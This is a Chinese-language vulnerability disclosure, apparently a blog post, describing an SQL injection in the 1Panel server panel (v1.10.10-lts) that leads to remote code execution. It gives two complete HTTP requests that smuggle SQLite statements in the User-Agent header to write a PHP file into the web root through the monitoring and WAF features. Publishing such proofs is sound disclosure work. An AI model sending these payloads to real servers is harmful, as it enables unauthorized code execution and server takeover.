智能摘要 AI
1Panel是一款Linux服务器运维管理面板,近期发现其存在SQL注入漏洞,可能导致远程代码执行。影响版本包括专业版和社区版v1.10.10-lts,涉及网站监控和WAF功能。利用条件包括开启特定功能并关闭WAF,攻击者可通过SQL注入写入恶意文件,进而执行代码。漏洞详情已在GitHub和JunBlog平台披露。
1Panel是一款新一代的Linux服务器运维管理面板,用户可以通过Web图形界面轻松管理Linux服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。它还深度集成了开源建站软件WordPress和Halo。
0x1 测试版本
专业版 v1.10.10-lts
社区版 v1.10.10-lts
1panel/openresty:1.21.4.3-3-1-focal
0x2 影响范围
0x3 网站监控功能GetShell
利用条件
- 专业版,并开启网站监控功能
- 关闭WAF功能
- 安装有1P-openresty容器且搭建有PHP环境网站
网站默认路径格式如下,这个路径是在op容器里面的路径:
/www/sites/网站代号(默认为域名)/index/通过SQL注入导出文件到网站路径下:
GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#然后我们可以在网站路径下看到写入的文件:
访问后发现成功输出 blog.mo60.cn 的md5值,成功执行代码:
0x4 Waf功能
利用条件
- 开启WAF功能
- 安装有1P-openresty容器且搭建有PHP环境网站
发送后即可成功写入文件:
GET /.git/config HTTP/1.1
Host: 192.168.99.6
User-Agent: blog.mo60.cn',"args", "sqlInjectA", "", "YmxvZy5tbzYwLmNu", "blog.mo60.cn", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#
Connection: close





评论 (0)